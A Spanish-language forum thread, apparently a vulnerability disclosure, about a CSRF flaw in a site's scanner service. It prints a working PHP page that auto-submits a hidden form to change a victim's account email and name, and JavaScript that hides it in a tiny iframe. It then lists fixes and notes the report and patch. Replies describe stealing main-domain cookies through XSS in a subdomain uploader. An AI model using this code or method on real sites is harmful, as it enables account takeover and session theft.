Url: scanner.underc0de.org
<?php
//Codded: Matabarras
$url = "scanner.underc0de.org"; //url
//Parametros post que modificaremos :D
$form["password"] = ""; //Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "[email protected]"; //cambiamos el correo por el que queramos
$form["fname"] = "meaburro"; //nombre
$form["lname"] = "vayavaya"; //apellidos
$form["newsletter"] = 0; //recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;
echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>
Camuflar el csrf, easy.
// This code was coded by FrenetikK & Matabarras.
function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}
writeIf('http://127.0.0.1/csrf.php');
Index
<script src="a.js"></script>
Soluciones:
- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.
Reportado? Si
Fixeado? Si pero no adecuadamente.
Solucionada vulnerabilidad mediante aplicación de un token específico para cada cuenta y verificación de contraseña actual.
Reporte de @Matabarras (https://underc0de.org/foro/index.php?action=profile;u=9777) Duplicado, reporte original por @MagoAstral (https://underc0de.org/foro/index.php?action=profile;u=26364) hace 2 semanas.
Gracias por reportar!
Saludos.
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra ::)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra ::)
Mmm... mala porque? Ahí si que me pillas
Cierto, Mago se jactaba mientras cantaba bachata(?)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra ::)
Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.
Ahora me pillas tú?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra ::)
Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.
Ahora me pillas tú?
Si, ya pillo por donde ibas :P en ese caso estando bajo el mismo dominio es cierto que puedes acceder a la cookie del dominio principal